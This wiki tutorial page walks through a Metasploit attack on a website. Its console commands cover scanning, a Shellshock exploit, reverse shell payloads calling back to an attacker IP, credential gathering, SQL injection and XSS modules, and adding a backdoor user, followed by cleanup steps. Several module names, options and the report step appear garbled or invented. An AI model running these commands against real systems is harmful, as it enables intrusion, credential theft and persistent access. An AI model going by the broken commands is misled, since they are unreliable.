METASPLOIT - Pentest a Personnal Website

From IT-Arts.net
Revision as of 16:40, 13 December 2025 by Admin (talk | contribs)


Starting Metasploit

First, launch Metasploit's console to begin the penetration test:

msfconsole

Web Scanning for Vulnerabilities

To scan for web vulnerabilities such as SQL injection or XSS, you can use the following module:

use auxiliary/scanner/http/dir_scanner set RHOSTS <target_ip> set PATHS /admin /login /wp-login.php run

Exploiting Vulnerabilities

Once information gathering is complete, you can search for known exploits for the identified vulnerabilities.

Searching for Exploits

Search for available exploits related to the website's technology stack:

search type:exploit <technology_or_vulnerability>

Example of Exploit Execution

If the target is running a vulnerable version of Apache or PHP, an exploit can be chosen and executed:

use exploit/multi/http/apache_mod_cgi_bash_env_exec set RHOSTS <target_ip> set TARGETURI /cgi-bin/test.cgi run

Post-Exploitation

After successfully exploiting the target, post-exploitation helps in maintaining access and extracting more sensitive data.

Creating a Reverse Shell

After gaining access, you can use a reverse shell payload to establish persistent access:

use payload/linux/x86/shell_reverse_tcp set LHOST <attacker_ip> set LPORT 4444 set RHOSTS <target_ip> run

Dumping Web Server Credentials

To dump web application credentials, you can use Metasploit's post-exploitation modules:

use post/multi/gather/enum_web_app_users set RHOSTS <target_ip> run

Exploiting Web Application Vulnerabilities

If a web application vulnerability such as SQL Injection is discovered, you can use Metasploit's web application exploitation tools.

Using SQL Injection Exploits

For a site vulnerable to SQL injection, you can try the following:

use exploit/multi/http/phpmyadmin_sql_injection set RHOSTS <target_ip> set TARGETURI /phpmyadmin set SQL_PAYLOAD "1' OR 1=1--" run

Using Cross-Site Scripting (XSS) Exploit

For a site vulnerable to XSS, you can attempt an exploit like the following:

use exploit/multi/http/xss set RHOSTS <target_ip> set TARGETURI /search.php set PAYLOAD "alert('XSS')" run

Maintaining Access

Once you’ve exploited a vulnerability and have gained access to the system, maintaining access is critical for further testing.

Adding a Backdoor User

You can add a backdoor user to maintain persistent access:

use post/linux/manage/adduser set RHOSTS <target_ip> set USERNAME <username> set PASSWORD <password> run

Creating a Reverse Shell Payload

Another method to maintain access is by setting up a reverse shell:

use payload/linux/x86/shell_reverse_tcp set LHOST <attacker_ip> set LPORT 4444 set RHOSTS <target_ip> run

Reporting

Once the penetration test is complete, you can generate a detailed report of your findings, including all exploited vulnerabilities and actions taken.

Generating a Report

To generate a simple HTML report:

spool /path/to/report.html report spool off

Clean Up

After the penetration test, it's crucial to clean up any backdoors or other remnants left behind on the target system.

Remove Backdoor User

If you added any backdoor users, remove them to ensure the system is no longer compromised:

use post/linux/manage/remove_user set RHOSTS <target_ip> set USERNAME <username> run

Deleting Reverse Shells

If you created any reverse shell listeners or sessions, make sure to terminate them:

sessions -K

Retrieved from "https://it-arts.net/index.php?title=METASPLOIT_-_Pentest_a_Personnal_Website&oldid=475"